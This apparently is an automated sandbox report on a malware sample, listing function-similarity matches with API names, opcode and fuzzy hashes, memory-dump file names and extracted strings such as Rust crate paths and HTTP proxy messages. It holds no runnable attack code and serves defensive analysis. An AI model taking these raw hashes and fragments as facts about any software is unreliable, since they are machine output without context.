                Yara matches
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 6884cc122900d09c2e80c4497b788fc7019c215181750ac59c273517aaf1b040
                • Instruction ID: 687bb1f6b8c1913ba295fff19ba4f8f5160c1b4634230356deec4b8e552b8a29
                • Opcode Fuzzy Hash: 6884cc122900d09c2e80c4497b788fc7019c215181750ac59c273517aaf1b040
                • Instruction Fuzzy Hash: 6F31727061DB1A8FEB94EF1CA85166933E1F79D310F6101AEE449C32A1CB74DC819BC2
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: AddressSingleWake
                • String ID:
                • API String ID: 3114109732-0
                • Opcode ID: ae26ab14712aa5630e19a575096875eb225210e5d4dc04ca41d98d982909760f
                • Instruction ID: af1191beb93a431a76b85b3b8c0a51efbca397b38372a2ed05cebdacdaa318ec
                • Opcode Fuzzy Hash: ae26ab14712aa5630e19a575096875eb225210e5d4dc04ca41d98d982909760f
                • Instruction Fuzzy Hash: 7E31C32361DE4181FA51EF05E4413BAE7A0AF88760F844172EA8E4B396DF3CD689C720
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: QueryValue
                • String ID:
                • API String ID: 3660427363-0
                • Opcode ID: e31f994130b95db72ccabd40e81872a84d70798264efd81d2829ceaa4d9210c0
                • Instruction ID: fc5856667bb8860ebe247e9d8c37a4d64e76f382cb18609b5c74f5c204bc24c0
                • Opcode Fuzzy Hash: e31f994130b95db72ccabd40e81872a84d70798264efd81d2829ceaa4d9210c0
                • Instruction Fuzzy Hash: 5121C322718A8186FB22AB12A50126AE760FB897E0F908072EECD47B55CF3CD199C710
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905152309.000001912B2B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B2B0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1912b2b0000_31#U544a.jbxd
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 5fb423b695f3cfee935d38655f8edca52d8f20018304c7478e5673635ce2a742
                • Instruction ID: 6efdde1a4ee2df7dd3b31b5ae8ce6e1cd5b7c830f4e8cf4836e247628a0826b6
                • Opcode Fuzzy Hash: 5fb423b695f3cfee935d38655f8edca52d8f20018304c7478e5673635ce2a742
                • Instruction Fuzzy Hash: F9E086602A8B092EB94C336528BB7FA31C4F30E211F60041AE886411D3FC453C8241C6
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorLast
                • String ID:
                • API String ID: 1452528299-0
                • Opcode ID: 5636dea1f9fccbc14995db8cbeaccc1f28c5d67ebd0219fb2a5366a0ec67acb3
                • Instruction ID: 26dde385f3ab3421c5637c55ad273303dd37c0c9df4e3f19a8186d89115bcd78
                • Opcode Fuzzy Hash: 5636dea1f9fccbc14995db8cbeaccc1f28c5d67ebd0219fb2a5366a0ec67acb3
                • Instruction Fuzzy Hash: 81E092A1A18A058AFB216A7480453BAA3905B98360F940972DA5C863C1DE3DD16D8720
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 13dce0c2ed7977bca88aee7810df4e821072f98d65f8970bb6098039871f721c
                • Instruction ID: 4a218534a520b88af4b3ed943f812cf2db41e43e2c385ca2f1d010e8e5ff3f48
                • Opcode Fuzzy Hash: 13dce0c2ed7977bca88aee7810df4e821072f98d65f8970bb6098039871f721c
                • Instruction Fuzzy Hash: 3931C93065DB058FEB98EF2DA4A476637E1F799310F20452DE14AC33A5D734EC819782
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001912B770000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1912b770000_31#U544a.jbxd
                Yara matches
                Similarity
                • API ID: FreeVirtual
                • String ID:
                • API String ID: 1263568516-0
                • Opcode ID: 44a50af090bd9a9f15baf6ddec63f32dc1979d6dc23cf38e8253f078d9970b2b
                • Instruction ID: 8cbefb0f2d65dcc196a5cbb058f9e34c7888f055030f1bc0dc8c9b63af31f16e
                • Opcode Fuzzy Hash: 44a50af090bd9a9f15baf6ddec63f32dc1979d6dc23cf38e8253f078d9970b2b
                • Instruction Fuzzy Hash: 35219330689A05AFFB94EB2CE45876937E2F799301F24052EE049D72E4C7389984DB42
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: f01af0c2a630b19e5c9dfd10714fd4266b936cb90e1d8849a772eebe551dbc21
                • Instruction ID: f07a3673f59353d76d210587e251f6451e60a5b6d37ff6e909804835ad18605f
                • Opcode Fuzzy Hash: f01af0c2a630b19e5c9dfd10714fd4266b936cb90e1d8849a772eebe551dbc21
                • Instruction Fuzzy Hash: C1D0C202F05C5282F676762AA4851B9D220DB88730F9083B3CBBD063D08E2EE9DF5310
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: HTTP/1.1 200HTTP/1.0 200HTTP/1.1 407unsuccessful tunnelproxy authentication requiredproxy headers too long for tunnel$User-Agent: Proxy-Authorization: $future polled after completion/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-native-tls-0.3.1/src/lib.rs$no host in urlscheme and authority is valid Uri$unexpected eof while tunneling
                • API String ID: 3510742995-2507051208
                • Opcode ID: 9e233cc7c7a6e4a2350cbcb09bfe674d677c64c52aa91cf88c253697d9be228e
                • Instruction ID: 04e73e6da6312309db9bd59b700c44ab84c379ed4436c04453d05c8f2ec54b36
                • Opcode Fuzzy Hash: 9e233cc7c7a6e4a2350cbcb09bfe674d677c64c52aa91cf88c253697d9be228e
                • Instruction Fuzzy Hash: 39D25E22608FC180F761AF25E4543EAA761FB89B98F844076DE8C1775ADF38D29DC720
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: PRI * HTTP/2.0SM$assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZE/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/h2-0.3.24/src/frame/settings.rs$assertion failed: max <= std::u32::MAX as usize$called `Result::unwrap()` on an `Err` value$invalid SETTINGS frame$invalid initial remote window size$invalid initial window size
                • API String ID: 3510742995-1858801466
                • Opcode ID: 6fe44f72a5d5090fa8b0dd262600670ce53404be43f71db7f105898d2d57a901
                • Instruction ID: b72c7d9cf5cd4f3cdae568485105ff96c03645ae1fb16e61bec905a98365cecf
                • Opcode Fuzzy Hash: 6fe44f72a5d5090fa8b0dd262600670ce53404be43f71db7f105898d2d57a901
                • Instruction Fuzzy Hash: 39B3C136609FC486D7A5CB15E4847DAB3A8F788B94F41412ADBDC83B58EF38D5A5CB00
                APIs
                Strings
                • .debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_typesNulErrorUtf8Errorvalid_up_toerror_len, xrefs: 00007FF71A828480
                • .debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwostd\src\..\..\backtrace\src\symbolize\gimli.rs, xrefs: 00007FF71A82ACA0
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: .debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_typesNulErrorUtf8Errorvalid_up_toerror_len$.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwostd\src\..\..\backtrace\src\symbolize\gimli.rs
                • API String ID: 3510742995-1621003032
                • Opcode ID: 465c0c65468802312c141db401ffbef177e1cebf0727745518d51c0557809070
                • Instruction ID: b6b35a65548167fda90fdac518ba089528d4153e4bf45f971f0e367ba13762a3
                • Opcode Fuzzy Hash: 465c0c65468802312c141db401ffbef177e1cebf0727745518d51c0557809070
                • Instruction Fuzzy Hash: 6C634F22A05FC588FB71AF25D8447F973A0FB44798F904227CA8D4BB99DF389299C350
                APIs
                Strings
                • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 00007FF71A846BC6
                • internal error: entered unreachable codemid > len, xrefs: 00007FF71A846C10
                • stack backtrace:, xrefs: 00007FF71A846388
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: ErrorLast$memset$CaptureContextCreateCurrentDirectoryEntryFunctionLookupSnapshotToolhelp32
                • String ID: internal error: entered unreachable codemid > len$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                • API String ID: 3426570729-3115839456
                • Opcode ID: 700dbfeda4b2ac3080319a059293a7588f7470218d2d891fa21f6de7dd7a7558
                • Instruction ID: bf3d798719c5143b09c29adc2b1de06a788d30d2bfa9b0cc246d8481513ebbf5
                • Opcode Fuzzy Hash: 700dbfeda4b2ac3080319a059293a7588f7470218d2d891fa21f6de7dd7a7558
                • Instruction Fuzzy Hash: A8825D32A09FC188FB71AF25D8443E9A7A0FB457A8F844176DA4D0BB95DF38D298C351
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: Error$Last$ConsoleWriteabort$ByteCaptureCharCloseContextHandleMultiObjectSingleStatusUnwindWaitWide
                • String ID: called `Result::unwrap()` on an `Err` value
                • API String ID: 2746922508-2333694755
                • Opcode ID: 1943f669cd461ed7cfe3f0caab3c986ac50bc5a7770bbf290810a4577c30efa1
                • Instruction ID: bbca03b8aa5020b86e79d6a0ac4f1eb8c32b22517468fdca985d59b64da2e81a
                • Opcode Fuzzy Hash: 1943f669cd461ed7cfe3f0caab3c986ac50bc5a7770bbf290810a4577c30efa1
                • Instruction Fuzzy Hash: C5F1D565E08B9255FB12AB60D8403F9A761EB447A4F944273DE4D07AC9EF3CE5ADC320
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy
                • String ID: assertion failed: !stream.is_counted$assertion failed: self.can_inc_num_recv_streams()$called `Result::unwrap()` on an `Err` value
                • API String ID: 3510742995-2512240639
                • Opcode ID: bb9b4cdea68c3c6c5502eeef38eb9c56a70cb39bf36ed3e7c2f9ee69dbe14ae8
                • Instruction ID: 57d6ff72017813b7cfa37e73b2605ffda07cb6d14e3ef007cd4bdf461085fd69
                • Opcode Fuzzy Hash: bb9b4cdea68c3c6c5502eeef38eb9c56a70cb39bf36ed3e7c2f9ee69dbe14ae8
                • Instruction Fuzzy Hash: 7B725976A0CAC18AE771AB14E0403EAF7A0FB89754F844066DAC903B59DF3DE659CF50
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: FormatMessagememset
                • String ID: NTDLL.DLL
                • API String ID: 3726309721-1613819793
                • Opcode ID: eab33b93f710d010e714ec6f04dbc267099dab0d677ccf8e740f568767f6d4bd
                • Instruction ID: 812cf504a414662c98e8821e2904a15715312c5d8dc2b506b1a2fcdbd6e4678d
                • Opcode Fuzzy Hash: eab33b93f710d010e714ec6f04dbc267099dab0d677ccf8e740f568767f6d4bd
                • Instruction Fuzzy Hash: 6BE1B736609EC389F7329F2598047FDA6A1FB147A8F844177CA4D06BCACF789259D360
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID:
                • String ID: 33333333$33333333$33333333$TUUUUUUU$UUUUUUUU$UUUUUUUU$UUUUUUUU
                • API String ID: 0-2965141230
                • Opcode ID: f60313ba9b9ab27c5cf7d4157401e696c36093c9a3e5ca48406e424ac9b852ae
                • Instruction ID: 125652812ce13c8294af570f2b8b1913d39a060cc9731a1ee06570584131660a
                • Opcode Fuzzy Hash: f60313ba9b9ab27c5cf7d4157401e696c36093c9a3e5ca48406e424ac9b852ae
                • Instruction Fuzzy Hash: 8A91F592B24B9442FD04DB1254263BA9B51FB88FF0B49D536DE5E17B89DD3CD10AC301
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: signal
                • String ID: CCG
                • API String ID: 1946981877-1584390748
                • Opcode ID: 8ac57d90e42a4040e0776beffc95396a19b90a09367fec87e1717899c4fa4228
                • Instruction ID: 2a9a49c814b06790da5edc0920132cfa28f6bb02e91f0bbcf09526ad68d8c267
                • Opcode Fuzzy Hash: 8ac57d90e42a4040e0776beffc95396a19b90a09367fec87e1717899c4fa4228
                • Instruction Fuzzy Hash: 5921D560E08D0241FF76366984593B891E1EF65334FD446B3DD2D923D0ED1CE8A94B21
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcpy$memset
                • String ID:
                • API String ID: 438689982-0
                • Opcode ID: 7ef0bf32e0dff958b79f3f03d2aaa8bd88d078c67ff27315aee72a194ae9b298
                • Instruction ID: 873ee0f9ff95a6e7cd957e134e9075ed0cac1c92a02650edbbd98c7d2a7fa2a5
                • Opcode Fuzzy Hash: 7ef0bf32e0dff958b79f3f03d2aaa8bd88d078c67ff27315aee72a194ae9b298
                • Instruction Fuzzy Hash: 7C028766D19FC591F712AB3590432EAE310EFDA790F40D322DEC876A56DF68E24A8710
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID:
                • String ID: H$a non-empty list of numbers$xn--
                • API String ID: 0-1214865122
                • Opcode ID: 02a82ffb36a74138aaf799468da970503353c98edbf0005a8b79749736b52315
                • Instruction ID: d814979096409333163eb7123e983a3f1d9510d0f73d9816a8bde02aad457f34
                • Opcode Fuzzy Hash: 02a82ffb36a74138aaf799468da970503353c98edbf0005a8b79749736b52315
                • Instruction Fuzzy Hash: E623C372A0CA8281FF66AA15E0543BEE3A1EB847A0F944077DE8D07695DF3CE59DC710
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID:
                • String ID: arenegyl$modnarod$setybdet$uespemos
                • API String ID: 0-66988881
                • Opcode ID: 113a1e3b4355a652b889cbf09a56c72cddd3ecfdee0c50286b3d641f9a01b346
                • Instruction ID: f0bd18902d32d4c2e3762e6b017d1db1fdf445eb13c7f0c6b2da6c56c2d56590
                • Opcode Fuzzy Hash: 113a1e3b4355a652b889cbf09a56c72cddd3ecfdee0c50286b3d641f9a01b346
                • Instruction Fuzzy Hash: E341F8A2B04F4642FF649F15E65026AE362EB587E4F40E132CE9D47B19DE2CD399C300
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID: memcmp
                • String ID: called `Result::unwrap()` on an `Err` value$file://$localhost
                • API String ID: 1475443563-2437099029
                • Opcode ID: 7808e8c62cbcf72d1c16be5caacce0cf6690ad052dd36c005e186cc515d91941
                • Instruction ID: ead9ca9d7e32c9c718927fe29b06bc7a4da6a1b19f575a6abeee021d96637775
                • Opcode Fuzzy Hash: 7808e8c62cbcf72d1c16be5caacce0cf6690ad052dd36c005e186cc515d91941
                • Instruction Fuzzy Hash: 64729262A08B8182FB25EB16E4407AAB7A0FB49BD4F848076DF8D43B55DF3CE159C710
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c7b26ae574ae0dd688155c3ad15413920a3b6c5a24eda3ad677afa00ed149288
                • Instruction ID: 3c100e03cd20dca7f7f25792c90ec5fd267cfe680bfb451989c14f708558e958
                • Opcode Fuzzy Hash: c7b26ae574ae0dd688155c3ad15413920a3b6c5a24eda3ad677afa00ed149288
                • Instruction Fuzzy Hash: 3362C452E04FC482EB119F29D6012E86760FB687E8F859721DFAD17792EB34E6E5C340
                Memory Dump Source
                • Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true
                • Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6bf8e16c863e984847b13e24ed0c1c73718213160d3a657dcba5cfc1109192cb
                • Instruction ID: d2ac716f71e26180ffccd2d39d7d098eeb07ad5b3db93e54485f5bea74b6e1e9
